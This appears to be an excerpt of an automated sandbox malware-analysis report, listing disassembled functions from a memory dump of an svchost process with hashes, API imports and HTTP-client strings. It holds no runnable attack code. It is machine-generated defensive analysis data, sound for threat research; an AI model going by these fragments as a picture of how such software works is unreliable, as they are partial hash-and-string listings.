                                                                • Opcode ID: 709b11ccf052b55cd202305e6cbd407866a447e216ba33172544a202e0303097
                                                                • Instruction ID: 69864e71a8c49087da965bc4105dc7f8801921275da64386cfe58e9193b103af
                                                                • Opcode Fuzzy Hash: 709b11ccf052b55cd202305e6cbd407866a447e216ba33172544a202e0303097
                                                                • Instruction Fuzzy Hash: B4B12B7A209B4486EB758B69D8403EDA7F5E704FD8FD80215CEAD06394FB39C958EB00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 0-2522224428
                                                                • Opcode ID: 7a8e5cfe7a1db2edb1b6a494e2eb3a7716bf34f0730d2bffec29c10d8b21fb3e
                                                                • Instruction ID: 77ff13f6762f33691f13fbba1c229401c642eaefc8e872036f483701cf1fa303
                                                                • Opcode Fuzzy Hash: 7a8e5cfe7a1db2edb1b6a494e2eb3a7716bf34f0730d2bffec29c10d8b21fb3e
                                                                • Instruction Fuzzy Hash: B8B12A7A209B4486EB758B69D8403ECA7F5E704F98FD84215CEAD07394FB39C959EB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2653869212-2522224428
                                                                • Opcode ID: 2a92e434845d3c94a234db9cc82dc5f49bf461cb96b319b5a31757b7054bf419
                                                                • Instruction ID: 9875f67b24fb846cd50306c4c2cb9a61bc310ce28ba57ea503b0c015533b3148
                                                                • Opcode Fuzzy Hash: 2a92e434845d3c94a234db9cc82dc5f49bf461cb96b319b5a31757b7054bf419
                                                                • Instruction Fuzzy Hash: EEB12A7A209B4486EB758B69D8503EDA7B5E704F98FD80215CEAD06394FB39C958EB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdupmalloc
                                                                • String ID: %s?%s$Failed sending Gopher request
                                                                • API String ID: 111713529-132698833
                                                                • Opcode ID: 27f1859d9793bf00524c1d5affff30fe9c262b0222979bbcb1fc6aabb92e09fb
                                                                • Instruction ID: 24617c839bdbc785e65c012db53df2ce9c6a14f121b1c4e504b4dbd9c23119c7
                                                                • Opcode Fuzzy Hash: 27f1859d9793bf00524c1d5affff30fe9c262b0222979bbcb1fc6aabb92e09fb
                                                                • Instruction Fuzzy Hash: 8F61747A30969482FB619BA6E4403D9A6A0A785FF4F840321DF7D477D5FB38C687A700
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                                                                • API String ID: 1294909896-1147549499
                                                                • Opcode ID: 103b107586fa9227b45bf145222309df3821b1e95c9e2af278b0af28645039d7
                                                                • Instruction ID: f950f0c84397d9f0d5f624cffe5e3075b823acbaabdcd7b7b6e401ea3a8c0b5f
                                                                • Opcode Fuzzy Hash: 103b107586fa9227b45bf145222309df3821b1e95c9e2af278b0af28645039d7
                                                                • Instruction Fuzzy Hash: DF414FB930D65081FA78A7A2E9517EED271AB81FD0FC04115DDBF46AC6FF28C642A311
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdup$callocfreestrrchr
                                                                • String ID: Wildcard - Parsing started
                                                                • API String ID: 2641349667-2475583933
                                                                • Opcode ID: 44ab88a669aa04c62231100cdfcaf3a3da64f94eca007dd566c131d75bcdbf31
                                                                • Instruction ID: fd31dabfd2af994f080d6e9c757512ddfc1f821c764752b1f99076babb922a95
                                                                • Opcode Fuzzy Hash: 44ab88a669aa04c62231100cdfcaf3a3da64f94eca007dd566c131d75bcdbf31
                                                                • Instruction Fuzzy Hash: 5F41573A609B82C6FB66DB95E40439DA7B0F788B84F844024DBAD47792FF38C665D340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_time64
                                                                • String ID: ?
                                                                • API String ID: 3087401894-1684325040
                                                                • Opcode ID: ede764a78d3ca367c2767017dfa413e1f286ce038fd3d8e2205f52a6027f1c88
                                                                • Instruction ID: 4f856aba80dde0af4a3f2fbf3d4fc1657643e8c6aa20dbae0ef5d2f44cc3a3cb
                                                                • Opcode Fuzzy Hash: ede764a78d3ca367c2767017dfa413e1f286ce038fd3d8e2205f52a6027f1c88
                                                                • Instruction Fuzzy Hash: BC31EC3A609A5185EA708F62E8402ADE3B4F789FE4F980525DE7E47B58EF38C5419700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: freestrncmp
                                                                • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$file$file://%s%s%s$https$xn--
                                                                • API String ID: 1891267927-4130347283
                                                                • Opcode ID: bb1c2040727a8c6a5536ab0f08df1104da565601866446cf42d0101fceef3854
                                                                • Instruction ID: a3a8eb9edb5d47e0857be9de641f6375ed7d9726b4060f7f1485ee52ad3c0049
                                                                • Opcode Fuzzy Hash: bb1c2040727a8c6a5536ab0f08df1104da565601866446cf42d0101fceef3854
                                                                • Instruction Fuzzy Hash: 3DC16E3A60DB8096EA758B91E5403DAE3F0F744BC4FC840169AAD53B95FF38D65AE700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr
                                                                • String ID: %zx$0$0$Malformatted trailing header, skipping trailer$http_chunk, added last chunk with trailers from client -> %d$http_chunk, added last, empty chunk$http_chunk, made chunk of %zu bytes -> %d$operation aborted by trailing headers callback
                                                                • API String ID: 2830005266-126491959
                                                                • Opcode ID: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                • Instruction ID: 8040a1c7069580d0a79b6cdce9c756f6b447c416f29002016660d83f2d13d2dc
                                                                • Opcode Fuzzy Hash: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                • Instruction Fuzzy Hash: E081A07A60CA4492EB70DBA5E4447DAA3B0E385FD4FC44012EA6E87695FF38C74AD700
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c8dc4a0aaf0ad9003701c7c8bbbc3a3aec79601f338a5ba5a9cbfc21c16228b
                                                                • Instruction ID: 189a74493b4de2f90dc2e7a1741732ed7aeb8ace7fbbbdf1d9390f4426c6c179
                                                                • Opcode Fuzzy Hash: 7c8dc4a0aaf0ad9003701c7c8bbbc3a3aec79601f338a5ba5a9cbfc21c16228b
                                                                • Instruction Fuzzy Hash: DF418E3960AB5191FB34DB91E5843E8A3B1AB49FE4F880224DD6D03794FF7CCA41A340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$SimpleString::operator=
                                                                • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$POST$Referer$Referer: %s
                                                                • API String ID: 1621822926-997604947
                                                                • Opcode ID: dd1f404e633f12ecf2762c7c30f49c178b6249a10c20961f453e78add58c1093
                                                                • Instruction ID: 8f151758df0d4680d379df0166947d0379c6252c630f3ab6d217c8fe0f32c257
                                                                • Opcode Fuzzy Hash: dd1f404e633f12ecf2762c7c30f49c178b6249a10c20961f453e78add58c1093
                                                                • Instruction Fuzzy Hash: 44412A79209B8080EB769BA0D4503D9A6F4F789FD8FC84139DE6D4A689FF38C655E310
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$SimpleString::operator=
                                                                • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$PUT$Referer$Referer: %s
                                                                • API String ID: 1621822926-4091559278
                                                                • Opcode ID: 7b140460cf876aba7226aacabe40a2d78e3099877e0fa5f31f295fa9c093a4e9
                                                                • Instruction ID: 065b67700ba7203ecac87ef8c1b99c8eb01cacd96e1c561044ffca345616fa7c
                                                                • Opcode Fuzzy Hash: 7b140460cf876aba7226aacabe40a2d78e3099877e0fa5f31f295fa9c093a4e9
                                                                • Instruction Fuzzy Hash: 3B412A79209B8080EB769BA0D4503D9A6B4F789FD8FC84139DE6D4A689FF38C655E310
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupfree$callocmemset$mallocmemmove
                                                                • String ID:
                                                                • API String ID: 3958593022-0
                                                                • Opcode ID: dff4d43b1f82b3be16d3f5602984e88871eb33e8f07b2bcaf38b4029c8e1b8cb
                                                                • Instruction ID: 5ca3562ca82e9f5e6709dd10da05355e4ad378308b5dd3f92c4b0e39f416c54a
                                                                • Opcode Fuzzy Hash: dff4d43b1f82b3be16d3f5602984e88871eb33e8f07b2bcaf38b4029c8e1b8cb
                                                                • Instruction Fuzzy Hash: CCA15D39209B8181EB699FA5D8503EDA3B0EB45FD8FC842359A7D4B6C6FF34D2509321
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdupinet_pton$calloc
                                                                • String ID:
                                                                • API String ID: 1961295042-0
                                                                • Opcode ID: 7066de9b0697eea2c7ffd98562010f7cf58f24a0038b9dd01b2d900d99e75690
                                                                • Instruction ID: 83cb8b458af83378b4c9a9a450b4a032164f1d9cb588e437c3524769157279ed
                                                                • Opcode Fuzzy Hash: 7066de9b0697eea2c7ffd98562010f7cf58f24a0038b9dd01b2d900d99e75690
                                                                • Instruction Fuzzy Hash: A8518F3A209B80C2EB268F96D4503A8B7B0F759FD4F884125CB6D07791EF38C6A1A700
                                                                APIs
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                  • Part of subcall function 00000173D01626D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                  • Part of subcall function 00000173D01626D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                • wcschr.VCRUNTIME140 ref: 00000173D0164691
                                                                • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01646BD
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01646FB
                                                                • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D0164716
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0164734
                                                                • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D016474D
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0164779
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D016478E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$ByteCharMultiWide_wcsdupmalloc$wcschrwcsncpy
                                                                • String ID:
                                                                • API String ID: 3696254116-0
                                                                • Opcode ID: 8620fd48158dc7c22be04266da9e9dbd57cb15bb93cfff5a3d7557f6419d7bf0
                                                                • Instruction ID: d1b7a21aafbb571d2ee79f90acecb30a0dd716ae5621e87d9891188d3f5e3ce8
                                                                • Opcode Fuzzy Hash: 8620fd48158dc7c22be04266da9e9dbd57cb15bb93cfff5a3d7557f6419d7bf0
                                                                • Instruction Fuzzy Hash: 9B41C439609B5082EE21DF92E8047AAA3B0F74AFD4FC94625DD2E07791FF38D1859300
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D017B7C1
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182547
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182557
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182565
                                                                  • Part of subcall function 00000173D0182510: memset.VCRUNTIME140 ref: 00000173D018259B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D017B81E
                                                                  • Part of subcall function 00000173D0194030: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0194047
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc$memset
                                                                • String ID: Content-Type$Transfer-Encoding$Transfer-Encoding:$chunked$multipart/form-data
                                                                • API String ID: 2591755499-1003861500
                                                                • Opcode ID: 816db0b0b0f91339b2475bf9136076f41c8bbafb1aa664cac9532527c286d9ca
                                                                • Instruction ID: 7e98543b869184ca19f1136ccb7b223c929e24283cfc3ac6798c9c6b6b449d71
                                                                • Opcode Fuzzy Hash: 816db0b0b0f91339b2475bf9136076f41c8bbafb1aa664cac9532527c286d9ca
                                                                • Instruction Fuzzy Hash: D471983A60864081EB298B5AE5943E9A3B1E7C5FC8F9C0035DF2D0B7D9FF29CA409300
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D016063B
                                                                  • Part of subcall function 00000173D0162830: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162865
                                                                  • Part of subcall function 00000173D0162830: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162886
                                                                  • Part of subcall function 00000173D0162830: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162894
                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00000173D0160688
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00000173D01607B4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$__acrt_iob_func_wfopencallocfclose
                                                                • String ID: -$Set-Cookie:$WARNING: failed to open cookie file "%s"
                                                                • API String ID: 1265547967-2358014132
                                                                • Opcode ID: 0421751e81405401c853245beb07fbe5ad2a70d4e1bd7c9dcffa53bd47de7ac0
                                                                • Instruction ID: 49a492fd874e84c2c6c2d756578ec5ca4f62b71d4f15346ef97fe03f4752d5d0
                                                                • Opcode Fuzzy Hash: 0421751e81405401c853245beb07fbe5ad2a70d4e1bd7c9dcffa53bd47de7ac0
                                                                • Instruction Fuzzy Hash: 0651C03920879141EA769B61E8103EEE6A1B782FD0FC84111DEBD07BC6FB39C651E700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupstrcspn
                                                                • String ID: %s%s$() {%*]\"$LIST "%s" *
                                                                • API String ID: 3695213020-1363964841
                                                                • Opcode ID: 4c0b89fa279ba62d6b696ebe0fac23c78ba0318a377c95cdb86f7bd5457708f7
                                                                • Instruction ID: 29c940c6768f8c372b6944929edff8b5fb0d20f10bec4529d1923655bdd3ae1d
                                                                • Opcode Fuzzy Hash: 4c0b89fa279ba62d6b696ebe0fac23c78ba0318a377c95cdb86f7bd5457708f7
                                                                • Instruction Fuzzy Hash: 3741913920C68A91EBB28B95E4803DDE7B0AB45FD4FC80121DA6D077D5FB6CC741AB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _gmtime64
                                                                • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                                                                • API String ID: 1355024304-4153637960
                                                                • Opcode ID: 5a0679d5686de0adceff9f51d142b256cbefe22dce193e245b42af48054b9b40
                                                                • Instruction ID: 631d82509e44603971802a474968dff261a90926ac0c1785d8e5285c80242a5a
                                                                • Opcode Fuzzy Hash: 5a0679d5686de0adceff9f51d142b256cbefe22dce193e245b42af48054b9b40
                                                                • Instruction Fuzzy Hash: AC411E3920CB8186E770DB95E4503DAE7B1F38ABC0F940126EA5E47B99EB79D641DB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: __acrt_iob_funcmemmovestrchr
                                                                • String ID: Failed to encode DoH packet [%d]$https
                                                                • API String ID: 4033746602-1520151043
                                                                • Opcode ID: e4c5fd03ec8ce9b657c010176a12e4d723095ae9b07db94a24dc2a9c833f3eb5
                                                                • Instruction ID: a4b01a71ed88ce9d7d884af889f83d976249c415d563275707cee2e6f6b9f27b
                                                                • Opcode Fuzzy Hash: e4c5fd03ec8ce9b657c010176a12e4d723095ae9b07db94a24dc2a9c833f3eb5
                                                                • Instruction Fuzzy Hash: 0402F07A21979001EB349A90D8487FEE764EB41FC8FD58625DE2E077C2FB25C641A380
                                                                APIs
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE366
